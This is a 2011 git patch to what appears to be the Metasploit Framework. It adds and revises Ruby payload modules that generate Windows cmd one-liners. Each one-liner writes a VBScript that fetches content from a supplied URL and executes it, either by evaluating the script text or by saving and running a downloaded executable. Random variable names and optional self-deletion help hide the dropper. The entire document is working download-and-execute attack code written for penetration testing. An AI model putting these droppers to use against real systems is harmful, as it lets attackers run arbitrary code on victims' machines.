From 5faaa7db0719306f92afce97c4bb4e879eeb9333 Mon Sep 17 00:00:00 2001 From: Matt Weeks Date: Sat, 11 Jun 2011 20:37:08 +0000 Subject: [PATCH] Update cmd vbs download payloads. Use : instead of longer echo statements. Add eval version. git-svn-id: file:///home/svn/framework3/trunk@12912 4d416f70-5f16-0410-b530-b9f4589650da --- .../singles/cmd/windows/download_eval_vbs.rb | 69 +++++++++++++++++++ .../singles/cmd/windows/download_exec_vbs.rb | 30 ++++---- 2 files changed, 87 insertions(+), 12 deletions(-) create mode 100644 modules/payloads/singles/cmd/windows/download_eval_vbs.rb diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb new file mode 100644 index 0000000000..da216cf1f7 --- /dev/null +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -0,0 +1,69 @@ +# $Id$ + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows .vbs Download and execute', + 'Version' => '$Revision$', + 'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script. + Use it to stage a vbs encoded payload from a short command line. ', + 'Author' => 'scriptjunkie', + 'License' => BSD_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::None, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + + register_options( + [ + OptString.new('URL', [ true, "The pre-encoded URL to the script" ]), + OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]), + OptBool.new('DELETE', [ true, "Delete created .vbs after download", false ]) + ], self.class) + end + + def generate + return super + command_string + end + + def command_string + # Keep variable names short. + vbsname = Rex::Text.rand_text_alpha(1+rand(2)) + xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2)) + + command = '' + command << "cmd.exe /q /c " if datastore['INCLUDECMD'] + command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+ + "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+ + "#{xmlhttpvar}.Send:"+ + "Execute #{xmlhttpvar}.responseText" + command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE'] + + # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window + # disappears quickly before the wscript libraries load and the file downloads + command << " >#{vbsname}.vbs"+ + "&start #{vbsname}.vbs" + end +end diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index a6f05afb6b..e23f918c35 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -37,7 +37,10 @@ module Metasploit3 register_options( [ - OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]) + OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]), + OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]), + OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]), + OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ]) ], self.class) end @@ -52,18 +55,21 @@ module Metasploit3 xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2)) streamvar = Rex::Text.rand_text_alpha(1+rand(2)) + command = '' + command << "cmd.exe /q /c " if datastore['INCLUDECMD'] # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window # disappears quickly before the wscript libraries load and the file downloads - "cmd.exe /q /c echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\") >#{vbsname}.vbs"+ -"&echo #{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False >>#{vbsname}.vbs"+ -"&echo #{xmlhttpvar}.Send >>#{vbsname}.vbs"+ -"&echo Set #{streamvar}=CreateObject(\"ADODB.Stream\") >>#{vbsname}.vbs"+ -"&echo #{streamvar}.Type=1 >>#{vbsname}.vbs"+ -"&echo #{streamvar}.Open >>#{vbsname}.vbs"+ -"&echo #{streamvar}.Write #{xmlhttpvar}.responseBody >>#{vbsname}.vbs"+ -"&echo #{streamvar}.SaveToFile \"%tmp%\\#{exename}.exe\",2 >>#{vbsname}.vbs"+ -"&echo CreateObject(\"WScript.Shell\").Run \"%tmp%\\#{exename}.exe\" >>#{vbsname}.vbs"+ -"&echo CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\" >>#{vbsname}.vbs"+ -"&start #{vbsname}.vbs" + command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+ + "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+ + "#{xmlhttpvar}.Send:"+ + "Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+ + "#{streamvar}.Type=1:"+ + "#{streamvar}.Open:"+ + "#{streamvar}.Write #{xmlhttpvar}.responseBody:"+ + "#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+ + "CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":" + command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE'] + command << " >#{vbsname}.vbs"+ + "&start wscript #{vbsname}.vbs" end end